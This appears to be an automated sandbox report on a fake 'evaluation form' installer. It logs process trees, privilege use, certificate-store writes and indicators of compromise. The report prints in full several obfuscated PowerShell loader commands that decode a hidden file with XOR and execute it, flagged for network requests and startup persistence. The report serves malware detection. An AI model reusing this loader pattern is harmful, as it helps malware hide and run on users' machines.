PDFescape_Desktop_Installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 PDFescape_Desktop_Installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 PDFescape_Desktop_Installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 PDFescape_Desktop_Installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
PDFescape_Desktop_Installer.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2824 PDFescape_Desktop_Installer.exe 2824 PDFescape_Desktop_Installer.exe 3152 powershell.exe 3152 powershell.exe 4144 powershell.exe 4144 powershell.exe 4100 powershell.exe 4100 powershell.exe 4188 powershell.exe 4188 powershell.exe 2184 powershell.exe 2184 powershell.exe 3872 powershell.exe 3872 powershell.exe 4264 powershell.exe 4264 powershell.exe 4332 powershell.exe 4332 powershell.exe 4400 powershell.exe 4400 powershell.exe 4480 powershell.exe 4480 powershell.exe 3152 powershell.exe 4100 powershell.exe 2184 powershell.exe 3872 powershell.exe 4144 powershell.exe 4188 powershell.exe 4264 powershell.exe 4332 powershell.exe 4400 powershell.exe 4480 powershell.exe 4100 powershell.exe 2184 powershell.exe 3872 powershell.exe 3152 powershell.exe 4144 powershell.exe 4188 powershell.exe 4332 powershell.exe 4264 powershell.exe 4400 powershell.exe 4480 powershell.exe 2824 PDFescape_Desktop_Installer.exe 2824 PDFescape_Desktop_Installer.exe 2184 powershell.exe 2184 powershell.exe 4100 powershell.exe 4100 powershell.exe 2184 powershell.exe 3152 powershell.exe 3152 powershell.exe 4100 powershell.exe 2184 powershell.exe 3152 powershell.exe 2184 powershell.exe 2184 powershell.exe 3872 powershell.exe 3872 powershell.exe 4100 powershell.exe 4100 powershell.exe 4100 powershell.exe 3152 powershell.exe 3152 powershell.exe 3872 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exePDFescape_Desktop_Installer.exemsiexec.exevssvc.exedescription pid process Token: SeDebugPrivilege 3872 powershell.exe Token: SeDebugPrivilege 3152 powershell.exe Token: SeDebugPrivilege 2184 powershell.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeDebugPrivilege 4100 powershell.exe Token: SeDebugPrivilege 4188 powershell.exe Token: SeDebugPrivilege 4264 powershell.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeDebugPrivilege 4400 powershell.exe Token: SeDebugPrivilege 4480 powershell.exe Token: SeShutdownPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeIncreaseQuotaPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeSecurityPrivilege 3224 msiexec.exe Token: SeCreateTokenPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeAssignPrimaryTokenPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeLockMemoryPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeIncreaseQuotaPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeMachineAccountPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeTcbPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeSecurityPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeTakeOwnershipPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeLoadDriverPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeSystemProfilePrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeSystemtimePrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeProfSingleProcessPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeIncBasePriorityPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeCreatePagefilePrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeCreatePermanentPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeBackupPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeRestorePrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeShutdownPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeDebugPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeAuditPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeSystemEnvironmentPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeChangeNotifyPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeRemoteShutdownPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeUndockPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeSyncAgentPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeEnableDelegationPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeManageVolumePrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeImpersonatePrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeCreateGlobalPrivilege 2824 PDFescape_Desktop_Installer.exe Token: SeBackupPrivilege 2812 vssvc.exe Token: SeRestorePrivilege 2812 vssvc.exe Token: SeAuditPrivilege 2812 vssvc.exe Token: SeBackupPrivilege 3224 msiexec.exe Token: SeRestorePrivilege 3224 msiexec.exe Token: SeRestorePrivilege 3224 msiexec.exe Token: SeTakeOwnershipPrivilege 3224 msiexec.exe Token: SeRestorePrivilege 3224 msiexec.exe Token: SeTakeOwnershipPrivilege 3224 msiexec.exe Token: SeRestorePrivilege 3224 msiexec.exe Token: SeTakeOwnershipPrivilege 3224 msiexec.exe Token: SeRestorePrivilege 3224 msiexec.exe Token: SeTakeOwnershipPrivilege 3224 msiexec.exe Token: SeRestorePrivilege 3224 msiexec.exe Token: SeTakeOwnershipPrivilege 3224 msiexec.exe Token: SeRestorePrivilege 3224 msiexec.exe Token: SeTakeOwnershipPrivilege 3224 msiexec.exe Token: SeRestorePrivilege 3224 msiexec.exe Token: SeTakeOwnershipPrivilege 3224 msiexec.exe Token: SeRestorePrivilege 3224 msiexec.exe Token: SeTakeOwnershipPrivilege 3224 msiexec.exe Token: SeRestorePrivilege 3224 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
PDFescape_Desktop_Installer.exepid process 2824 PDFescape_Desktop_Installer.exe 2824 PDFescape_Desktop_Installer.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
PDFescape_Desktop_Installer.exepid process 2824 PDFescape_Desktop_Installer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
MicrosoftEdge.exepid process 13120 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Choir-Director-Evaluation-Form.exeChoir-Director-Evaluation-Form.tmpPDFescape_Desktop_Installer.exemsiexec.exedescription pid process target process PID 1892 wrote to memory of 1520 1892 Choir-Director-Evaluation-Form.exe Choir-Director-Evaluation-Form.tmp PID 1892 wrote to memory of 1520 1892 Choir-Director-Evaluation-Form.exe Choir-Director-Evaluation-Form.tmp PID 1892 wrote to memory of 1520 1892 Choir-Director-Evaluation-Form.exe Choir-Director-Evaluation-Form.tmp PID 1520 wrote to memory of 2824 1520 Choir-Director-Evaluation-Form.tmp PDFescape_Desktop_Installer.exe PID 1520 wrote to memory of 2824 1520 Choir-Director-Evaluation-Form.tmp PDFescape_Desktop_Installer.exe PID 1520 wrote to memory of 2824 1520 Choir-Director-Evaluation-Form.tmp PDFescape_Desktop_Installer.exe PID 2824 wrote to memory of 784 2824 PDFescape_Desktop_Installer.exe regsvr32.exe PID 2824 wrote to memory of 784 2824 PDFescape_Desktop_Installer.exe regsvr32.exe PID 2824 wrote to memory of 784 2824 PDFescape_Desktop_Installer.exe regsvr32.exe PID 2824 wrote to memory of 3176 2824 PDFescape_Desktop_Installer.exe PDFescapeDesktopInstaller.exe PID 2824 wrote to memory of 3176 2824 PDFescape_Desktop_Installer.exe PDFescapeDesktopInstaller.exe PID 2824 wrote to memory of 3176 2824 PDFescape_Desktop_Installer.exe PDFescapeDesktopInstaller.exe PID 1520 wrote to memory of 3872 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 3872 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 3872 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 2184 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 2184 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 2184 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 3152 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 3152 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 3152 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4100 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4100 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4100 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4144 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4144 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4144 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4188 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4188 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4188 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4264 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4264 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4264 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4332 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4332 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4332 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4400 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4400 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4400 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4480 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4480 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 1520 wrote to memory of 4480 1520 Choir-Director-Evaluation-Form.tmp powershell.exe PID 3224 wrote to memory of 7056 3224 msiexec.exe srtasks.exe PID 3224 wrote to memory of 7056 3224 msiexec.exe srtasks.exe PID 3224 wrote to memory of 12172 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 12172 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 4396 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 4396 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 780 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 780 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 5144 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 5144 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 5144 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 5484 3224 msiexec.exe ws.exe PID 3224 wrote to memory of 5484 3224 msiexec.exe ws.exe PID 3224 wrote to memory of 6088 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 6088 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 6364 3224 msiexec.exe updater-ws.exe PID 3224 wrote to memory of 6364 3224 msiexec.exe updater-ws.exe PID 3224 wrote to memory of 11144 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 11144 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 6032 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 6032 3224 msiexec.exe MsiExec.exe PID 3224 wrote to memory of 5136 3224 msiexec.exe MsiExec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe"C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-HMJ2A.tmp\Choir-Director-Evaluation-Form.tmp"C:\Users\Admin\AppData\Local\Temp\is-HMJ2A.tmp\Choir-Director-Evaluation-Form.tmp" /SL5="$30030,111934780,999424,C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-A241P.tmp\PDFescape_Desktop_Installer.exe"C:\Users\Admin\AppData\Local\Temp\is-A241P.tmp\PDFescape_Desktop_Installer.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe /s "C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll"4⤵
- Loads dropped DLL
- Modifies registry class
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe"C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe" /RegServer4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
